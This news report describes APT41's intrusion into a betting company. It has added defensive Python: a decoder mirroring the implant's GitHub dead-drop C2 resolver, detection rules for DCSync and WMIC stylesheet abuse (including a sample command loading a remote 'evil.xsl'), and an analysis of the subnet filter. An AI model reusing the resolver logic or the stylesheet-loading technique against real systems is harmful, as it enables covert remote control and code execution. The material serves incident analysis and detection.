APT41, a Group of Chinese Hackers, Strikes the Betting Sector to Generate Profits

Chinese Nation-State Hackers APT41 Hit Gambling Sector for Financial Gain

A sophisticated cyber attack targeting the betting and gaming sector has been attributed to the Chinese state-sponsored group known as APT41 (also tracked as Brass Typhoon, Earth Baku, Wicked Panda, or Winnti), according to a statement shared with The Hacker News by Ido Naor, co-founder and CEO of the Israeli cybersecurity firm Security Joes. Naor said the attackers covertly harvested sensitive data from the victim for at least six months, including network configurations, user passwords, and credential material from the LSASS process.

During the breach, the attackers continuously updated their toolkit in response to the security team’s countermeasures. By monitoring the defenders’ actions, they adjusted their strategies and tools to elude detection and sustain persistent access to the compromised network.

The attack, which lasted nearly nine months this year and targeted one of Security Joes's clients, overlaps with an intrusion set that Sophos tracks as Operation Crimson Palace.

According to Naor, the company acted on the incident four months ago, stating, “These hacks rely on decisions by state-sponsored entities. This time, we strongly suspect that APT41 was motivated by financial gains.”

The operation was designed for stealth and combined several techniques to reach its objectives: a custom toolkit to bypass the security controls in the environment, extract critical data, and set up covert channels for persistent remote access.

Security Joes described APT41 as "skilled and systematic," noting its capacity to run espionage operations and to poison the software supply chain, leading to intellectual property theft and financially motivated attacks such as ransomware and cryptocurrency mining.

The initial access vector remains unknown, but the evidence points to spear-phishing emails, since no exploitable vulnerabilities were found in the internet-facing web applications and no supply chain compromise was identified.

Once inside the network, the attackers performed a DCSync attack, abusing Active Directory replication rights to request the password hashes of service and administrator accounts from a domain controller and so widen their access. With these credentials they established persistence and retained control of the network, focusing in particular on administrative and development accounts.

The attackers carried out thorough reconnaissance and post-exploitation, adapting their toolkit to counter defensive measures and escalate privileges, with the ultimate goal of downloading and executing additional malicious payloads.

The techniques used to reach those objectives include phantom DLL hijacking (dropping a DLL at a path that a trusted process searches but where no such file normally exists, so the rogue DLL is loaded without any legitimate file having to be replaced), abuse of the legitimate utility wmic.exe, and use of the compromised service accounts with administrator rights to launch execution.

In the next phase, a malicious DLL named TSVIPSrv.dll is retrieved over the SMB protocol. Once loaded, the payload connects to a hard-coded command-and-control (C2) server.

“In case the predefined C2 fails, the implant endeavors to update its C2 details by mining GitHub profiles using this URL: github[.]com/search?o=desc&q=pointers&s=joined&type=Users&.”

“The malware combs through the HTML output from the GitHub query, seeking sequences of capitalized terms separated solely by spaces. It retrieves eight such words, extracts the uppercase letters between A and P, generating an 8-character string that encodes the IP address of the new C2 server used in the attack.”
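The GitHub dead-drop resolver quoted above is easiest to understand as a parser. The following Python is an added example, not code from the article, from Security Joes, or from the implant itself: it strips tags from a constructed stand-in for the search results page, finds runs of capitalised words separated only by single spaces, and decodes the initials of the first eight-word run. The article says the 8-character string "encodes the IP address" but not how, so the mapping used here (A..P are sixteen symbols, one hex nibble each, eight nibbles giving four octets) is an assumption, as are the HTML snippet, the bio text and the resulting address.

```python
import ipaddress
import re
from typing import Optional

TAG = re.compile(r"<[^>]+>")
CAP_WORD = re.compile(r"^[A-Z][a-z]*$")


def capitalised_runs(html: str, min_len: int = 8):
    """Yield runs of at least min_len capitalised words separated only by single spaces."""
    text = TAG.sub(" ", html)
    for line in text.splitlines():
        run = []
        for token in line.split(" "):
            if CAP_WORD.match(token):
                run.append(token)
                continue
            if len(run) >= min_len:
                yield run
            run = []
        if len(run) >= min_len:
            yield run


def decode_c2(words) -> Optional[str]:
    """Turn the initials of eight words into an IPv4 address.

    Assumption (not stated in the article): A..P are sixteen symbols, so each
    initial is one hex nibble (A=0 ... P=15) and eight initials give the
    four octets. Any initial outside A..P means this run is not a payload.
    """
    initials = "".join(w[0] for w in words[:8])
    if len(initials) != 8 or any(not "A" <= ch <= "P" for ch in initials):
        return None
    nibbles = [ord(ch) - ord("A") for ch in initials]
    octets = bytes((nibbles[i] << 4) | nibbles[i + 1] for i in range(0, 8, 2))
    return str(ipaddress.IPv4Address(octets))


def resolve_fallback_c2(html: str) -> Optional[str]:
    """The first run on the page whose initials decode cleanly is the new C2."""
    for run in capitalised_runs(html):
        addr = decode_c2(run)
        if addr is not None:
            return addr
    return None


# Constructed stand-in for the search results page; not a real GitHub page.
# The heading is ordinary UI text with an initial outside A..P and is skipped;
# the attacker-controlled bio decodes to 192.168.1.10 under the mapping above.
SAMPLE_HTML = """
<h2>Top Users Sorted By Join Date Showing Results</h2>
<div class="user-list-item">
  <a href="/someuser">someuser</a>
  <p class="bio">Make All Keys Immutable And Bring Another Kettle</p>
</div>
"""

if __name__ == "__main__":
    print(resolve_fallback_c2(SAMPLE_HTML))
```

The defensive takeaway is the shape of the traffic rather than the string: a host that has no business with GitHub performing an anonymous user search with fixed query parameters (`q=pointers&s=joined`) and then opening a socket to an address that never appeared in DNS is worth an alert on its own, whatever the exact encoding turns out to be.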

The initial interaction with the C2 server allows for profiling the infected system and fetching further malware for execution through a socket connection.

Security Joes noted that after their activity was detected, the threat actors went quiet for a few weeks before returning with a refined approach. This involved running heavily obfuscated JavaScript embedded in a modified version of an XSL file ("texttable.xsl"), executed via the LOLBIN wmic.exe.

“When the command WMIC.exe MEMORYCHIP GET is triggered, it indirectly loads the texttable.xsl file to format the output, leading to the execution of the injected malicious JavaScript code,” explained the researchers.
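Both the DCSync step described earlier and the wmic.exe stylesheet trick just quoted leave distinctive Windows telemetry. The following Python is an added example, not code from the article or from Security Joes, that runs two detections over constructed events: Security event 4662 for DCSync (the replication control-access rights requested by an account that is not a domain controller) and Sysmon events 1 and 11 for the XSL abuse (a .xsl file written into the wbem directory, or wmic.exe told to load a stylesheet from a path or URL). The event dictionaries, the `DC_ACCOUNTS` allowlist and the reduced field set are assumptions for the example; the replication-right GUIDs are the real ones Active Directory uses.

```python
import re

# Control-access right GUIDs a DCSync request needs; they appear in the
# Properties field of Security event 4662 when replication is requested.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}

# Assumption: the defender maintains the set of domain controller computer
# accounts. DC-to-DC replication raises the same event and must not alert.
DC_ACCOUNTS = {"DC01$", "DC02$"}

# A stylesheet written into the WMI directory, e.g. the texttable.xsl that
# wmic.exe loads to format table output.
WBEM_XSL = re.compile(r"\\wbem\\[^\\]+\.xsl$", re.IGNORECASE)


def is_dcsync(ev: dict) -> bool:
    """Event 4662 granting replication rights to something other than a DC."""
    if ev.get("EventID") != 4662:
        return False
    props = ev.get("Properties", "").lower()
    if not any(guid in props for guid in REPLICATION_GUIDS):
        return False
    return ev.get("SubjectUserName", "") not in DC_ACCOUNTS


def is_wmic_xsl_abuse(ev: dict) -> bool:
    """Sysmon 11 write of a .xsl under wbem, or wmic.exe pointed at an external stylesheet."""
    eid = ev.get("EventID")
    if eid == 11 and WBEM_XSL.search(ev.get("TargetFilename", "")):
        return True
    if eid in (1, 4688):
        image = ev.get("Image", ev.get("NewProcessName", "")).lower()
        cmd = ev.get("CommandLine", "").lower()
        if image.endswith("\\wmic.exe") and "/format:" in cmd:
            parts = cmd.split("/format:", 1)[1].strip().split()
            target = parts[0].strip("\"'") if parts else ""
            # Built-in names such as list or csv are normal; a path or URL is not.
            return "://" in target or "\\" in target
    return False


def triage(events: list) -> list:
    """Return (rule, detail) pairs for every event that matches a rule."""
    hits = []
    for ev in events:
        if is_dcsync(ev):
            hits.append(("DCSync", ev["SubjectUserName"]))
        elif is_wmic_xsl_abuse(ev):
            hits.append(("WMIC-XSL", ev.get("TargetFilename") or ev.get("CommandLine")))
    return hits


# Constructed sample events (not real logs), reduced to the fields the rules use.
SAMPLE_EVENTS = [
    # Normal DC-to-DC replication: same GUIDs, but the subject is a known DC.
    {"EventID": 4662, "SubjectUserName": "DC02$", "ObjectType": "domainDNS",
     "Properties": "Control Access {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A service account asking for replication of all secrets: DCSync.
    {"EventID": 4662, "SubjectUserName": "svc_backup", "ObjectType": "domainDNS",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # The modified stylesheet being dropped into the wbem directory.
    {"EventID": 11, "Image": "C:\\Windows\\Temp\\upd.exe",
     "TargetFilename": "C:\\Windows\\System32\\wbem\\texttable.xsl"},
    # The trigger the article quotes looks entirely benign on its own, so the
    # file-write rule above is what catches this variant, not the process rule.
    {"EventID": 1, "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "CommandLine": "WMIC.exe MEMORYCHIP GET"},
    # The noisier variant, where the stylesheet is named explicitly.
    {"EventID": 1, "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "CommandLine": "wmic os get /format:\"\\\\10.0.0.5\\share\\evil.xsl\""},
]

if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```

The point of the two-rule split is that the variant in the article needs no suspicious command line at all: the only unusual thing is a write to a stylesheet under `wbem`, so a process-creation rule keyed on `/format:` would miss it. The allowlist in `is_dcsync` is the part that needs care in production; any account that legitimately replicates (for example Entra Connect or a backup product) must be added, or it will page every sync.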

The JavaScript acts as a downloader, using the domain time.qnapntp[.]com as its C2 server to fetch a next-stage payload that profiles the machine and sends the information back to the server, subject to filtering criteria that are likely intended to limit the implant to machines of interest.

“The intentional targeting of devices with IP addresses containing ‘10.20.22’ stands out in the code,” the researchers remarked.

“This indicates a focus on specific devices, particularly those within the subnets 10.20.22[0-9].[0-255]. By analyzing this data alongside network logs and the IP addresses of affected devices, we deduced that the attacker applied this filtering mechanism to impact solely the devices in the VPN subnet.”
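A substring test on the dotted address, as the researchers describe, is coarser than a subnet check, and an analyst scoping the incident should know exactly what it matches. The following Python is an added example, not code from the implant or from Security Joes: it mirrors the quoted filter, enumerates every /24 inside 10.20.0.0/16 on which it fires, and contrasts it with a proper network-membership test. The choice of 10.20.22.0/24 as the VPN range is an assumption for illustration; the article does not state the exact VPN prefix.

```python
import ipaddress


def targeted_by_substring(ip: str) -> bool:
    """Mirror of the quoted filter: the dotted string merely has to contain '10.20.22'."""
    return "10.20.22" in ip


def slash24s_matched(base: str = "10.20.0.0/16") -> list:
    """Every /24 inside base on which the substring filter fires.

    All addresses of a /24 share their first three octets, so testing the
    network address is enough to decide for the whole block.
    """
    hits = []
    for net in ipaddress.ip_network(base).subnets(new_prefix=24):
        if targeted_by_substring(str(net.network_address)):
            hits.append(str(net))
    return hits


def in_vpn_subnet(ip: str, vpn: str = "10.20.22.0/24") -> bool:
    """The precise check for scoping; the VPN prefix here is an assumption."""
    return ipaddress.ip_address(ip) in ipaddress.ip_network(vpn)


if __name__ == "__main__":
    # 10.20.22.0/24 plus 10.20.220.0/24 through 10.20.229.0/24: eleven blocks.
    print(slash24s_matched())
    # Addresses outside the 10/8 range match too, purely by string accident.
    for ip in ("10.20.22.7", "10.20.225.7", "110.20.22.7", "10.20.23.7"):
        print(ip, targeted_by_substring(ip), in_vpn_subnet(ip))
```

The eleven blocks the filter selects are exactly the 10.20.22[0-9].x range the researchers describe, but the same string test also fires on anything like 110.20.22.x; when correlating with network logs, it is the subnet check, not the substring, that decides whether a host was actually in scope.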